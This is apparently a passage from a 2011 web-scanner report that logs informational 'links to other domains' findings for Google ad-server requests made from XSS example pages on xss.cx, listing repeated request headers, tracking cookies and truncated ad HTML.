User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:34 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12313

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capitalone.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%2BOfficial%2BSite%26adU%3Dwww.CreditCards.com%26adT%3DMasterCard%2BCredit%2BCards%26adU%3Dwww.CardRatings.com%26adT%3D10%2BBest%2BCredit%2BCards%26gl%3DUS&amp;usg=AFQjCNEYTr9d4u5migeF6VTdMgu2wvduVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767107&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-snas.nbcuni.com.html&dt=1301749107666&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749107685&frm=0&adk=1607234649&ga_vid=742805196.1301749108&ga_sid=1301749108&ga_hid=1298488409&ga_fc=0&u_tz=-300&u_his=26&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=24&xpc=pgkSXmzPv7&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:51 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4375

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-cross-site-scripting-snas.nbcuni.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEj5gNM48wmsulaG6mlc9xjFUsrbw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766337&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-xss-cross-site-scripting.www1.hilton.com.html&dt=1301748337290&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748337301&frm=0&adk=1607234649&ga_vid=1036254669.1301748337&ga_sid=1301748337&ga_hid=1196469354&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=sFSInPVI8O&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:45:01 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4347

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-xss-cross-site-scripting.www1.hilton.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHlQT_TdbIf8lMv0Tb4MsRweIjuVg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749134308&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749134321&frm=0&adk=1607234649&ga_vid=1705879164.1301749134&ga_sid=1301749134&ga_hid=930736349&ga_fc=0&u_tz=-300&u_his=29&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=18&xpc=OPFNo6cnem&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-dork-cwe79-imp.fetchback.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.HostGator.com%26adT%3DHostGator%25E2%2584%25A2%2BOfficial%2BSite%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DApplication%2BVulnerabilities%26gl%3DUS&amp;usg=AFQjCNGiTOoMXyc2ANi9QpCPy7XPkzkAmA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767155&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbloomberg.com.html&dt=1301749155074&shv=r20110324&jsv=r20110321-2&saldr=1&correlator=1301749155083&frm=0&adk=1607234649&ga_vid=398237423.1301749155&ga_sid=1301749155&ga_hid=739299924&ga_fc=0&u_tz=-300&u_his=30&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895130&fu=0&ifi=1&dtd=13&xpc=XTXWqxCu6o&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4292

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bloomberg.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEZnig5uhPHw10_FzpugddR9EObXQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcareers.redhat.com.html&dt=1301748961724&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748961741&frm=0&adk=1607234649&ga_vid=584349983.1301748962&ga_sid=1301748962&ga_hid=392957726&ga_fc=0&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=22&xpc=5uo0by4EX1&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:25 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/careers.redhat.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DApplication%2BVulnerabilities%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BOnline%2BNetwork%2BScan%26adU%3Dwww.SQLCleanup.com%26adT%3DSQL%2BInjectionCleanup%2B%2524169%26gl%3DUS&amp;usg=AFQjCNGx3mlWb0vKD5SgYE-2LUSzC27zxQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-xss-cross-site-scripting.www1.hilton.com.html&dt=1301748341587&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748341598&frm=0&adk=1607234649&ga_vid=650324587.1301748342&ga_sid=1301748342&ga_hid=902371036&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=30&xpc=zXaTt9UFho&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:45:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7468

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-xss-cross-site-scripting.www1.hilton.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Hilton.com%26adT%3DHilton%2B%25C2%25AE%2BOfficial%2BSite%26adU%3DInsideUp.com/Business-VoIP-Service%26adT%3DCompare%2BBusiness%2BVoIP%26adU%3Dwww.altoedge.com/tapi-boards%26adT%3DCallURL%2B8%2BLine%2BTAPI%2BBoard%26gl%3DUS&amp;usg=AFQjCNET4Y5fgQNvkNA7S9glDsQ7Apit4Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
19.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html&dt=1301749061869&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749061880&frm=0&adk=1607234649&ga_vid=651718306.1301749062&ga_sid=1301749062&ga_hid=1107537743&ga_fc=0&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=16&xpc=r3dGxTIclv&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:06 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7719

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.vistaprint.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFMZOeBKgHTNvBtIn9YQRimfHs34A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbostonherald.com.html&dt=1301749231100&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749231111&frm=0&adk=1607234649&ga_vid=1958673198.1301749231&ga_sid=1301749231&ga_hid=1579418915&ga_fc=0&u_tz=-300&u_his=37&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=29&xpc=oQMWdMheiJ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
